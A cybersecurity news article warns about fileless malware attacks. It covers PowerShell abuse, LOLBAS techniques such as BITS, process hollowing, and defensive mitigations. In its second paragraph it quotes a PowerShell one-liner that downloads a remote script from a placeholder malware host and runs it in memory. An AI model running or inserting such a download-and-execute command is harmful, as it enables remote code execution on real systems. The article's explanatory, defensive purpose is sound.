HomeCyber BalkansHackers Utilizing PowerShell and Microsoft Authorized Applications for Malware Deployment

Hackers Utilizing PowerShell and Microsoft Authorized Applications for Malware Deployment

Published on

spot_img

Cybersecurity experts are currently issuing a caution against a rising trend in fileless attacks. These attacks involve hackers using PowerShell and legitimate Microsoft applications to deploy malware without leaving noticeable traces on compromised systems. This strategy has been in use for over two decades and has proven to be quite effective in bypassing traditional antivirus solutions and complicating efforts to respond to security incidents.

One of the main techniques employed by attackers is the abuse of PowerShell, Microsoft’s scripting language. By utilizing commands such as “iex((New-Object Net.WebClient).DownloadString(‘https://malware.com/payload.ps1’))”, hackers can retrieve and execute malicious scripts directly in memory without saving them to disk. This makes it incredibly challenging for standard security tools to detect such malicious activities. In addition to PowerShell, threat actors are also resorting to LOLBAS (Living Off the Land Binaries and Scripts) techniques. These methods involve misusing legitimate Microsoft applications and utilities to carry out malicious activities.

For example, the BITS (Background Intelligent Transfer Service) admin tool can be exploited to download and execute malware payloads when systems are inactive, effectively bypassing security controls. Another critical aspect of fileless attacks is memory injection, which allows attackers to disguise their malware as legitimate processes. One specific technique, known as Process Hollowing, involves executing a legitimate application in a suspended state, replacing its code in memory with malicious payload, and then resuming execution. This method, which was initially popularized by the Stuxnet malware, enables attackers to run their code under the guise of trusted system processes.

To mitigate the risk of fileless attacks, cybersecurity experts suggest implementing a multi-layered approach. This includes deploying Endpoint Detection and Response (EDR) solutions, enhancing memory analysis and monitoring capabilities, enabling comprehensive PowerShell logging, and implementing PowerShell Constrained Language Mode. Organizations are also advised to closely monitor Active Directory and regularly conduct Red Teaming exercises to identify and address vulnerabilities.

As fileless attacks continue to evolve, it has become evident that traditional file-based security measures are no longer sufficient. Organizations must adjust their security strategies to combat these advanced threats by focusing on behavior-based detection and robust monitoring of system activities throughout their entire network infrastructure. By staying vigilant and proactive in their cybersecurity efforts, businesses can better protect themselves against increasingly sophisticated cyber threats.

In conclusion, the rise of fileless attacks underscores the need for organizations to adapt and strengthen their cybersecurity defenses to effectively counter the evolving tactics of malicious actors. By embracing a multi-layered security approach and investing in advanced threat detection and monitoring capabilities, businesses can better safeguard their sensitive data and infrastructure from the growing threat landscape of today’s digital world.

Source link

Latest articles

2026 CSO Award Winners Highlight Cyber Innovation

CSO Online Honors 64 Security Organizations with 2026 CSO Awards In a move to celebrate...

Fortinet Addresses Two Critical RCE Vulnerabilities in FortiAuthenticator and FortiSandbox

Fortinet Faces Critical Vulnerabilities in Key Security Solutions Recent reports have highlighted significant vulnerabilities in...

Mass Supply-Chain Attack Targets npm and PyPi, Affects Mistral AI

Latest Development in Cybersecurity: The Mini Shai-Hulud Worm Becomes Open Source In an alarming new...

Microsoft Teams Vulnerability Enables Hacker Spoofing Attacks

A recently identified security flaw in Microsoft Teams for Android has raised significant concerns...

More like this

2026 CSO Award Winners Highlight Cyber Innovation

CSO Online Honors 64 Security Organizations with 2026 CSO Awards In a move to celebrate...

Fortinet Addresses Two Critical RCE Vulnerabilities in FortiAuthenticator and FortiSandbox

Fortinet Faces Critical Vulnerabilities in Key Security Solutions Recent reports have highlighted significant vulnerabilities in...

Mass Supply-Chain Attack Targets npm and PyPi, Affects Mistral AI

Latest Development in Cybersecurity: The Mini Shai-Hulud Worm Becomes Open Source In an alarming new...